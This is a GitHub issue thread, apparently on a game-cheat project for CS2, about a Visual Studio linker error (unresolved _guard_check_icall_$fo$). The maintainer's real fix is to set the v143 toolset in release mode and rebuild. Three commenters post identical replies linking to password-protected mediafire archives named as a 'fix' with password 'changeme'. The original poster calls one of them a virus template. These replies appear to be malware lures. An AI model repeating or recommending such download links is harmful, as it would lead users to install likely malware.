### ISSUE TITLE
unresolved external symbol _guard_check_icall_$fo$

### ISSUE THREAD

**Issue by only1mf** [Ripper99-x/CS2-Internal#19]
Severity	Code	Description	Project	File	Line	Suppression State	Details
Error	LNK2001	unresolved external symbol _guard_check_icall_$fo$	SourceEngine	..\CS2-Internal-main\libucrt.lib(checkcfg.obj)	1		

any fix for this error? tried quite some thing and cant get over

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by only1mf** [comment]
oh yea man for sure.. xd
![image](https://github.com/user-attachments/assets/5493d317-cd7a-4274-bbe1-58e34b589f0e)

**Comment by Ripper99-x** [comment]
Set platform toolset to v143 in release mode and rebuild.

**Comment by only1mf** [comment]
oh LOL thanks tho it worked

**Comment by only1mf** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

bro you didnt even change the password of your virus tamplate... like whos gonna fall for that

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
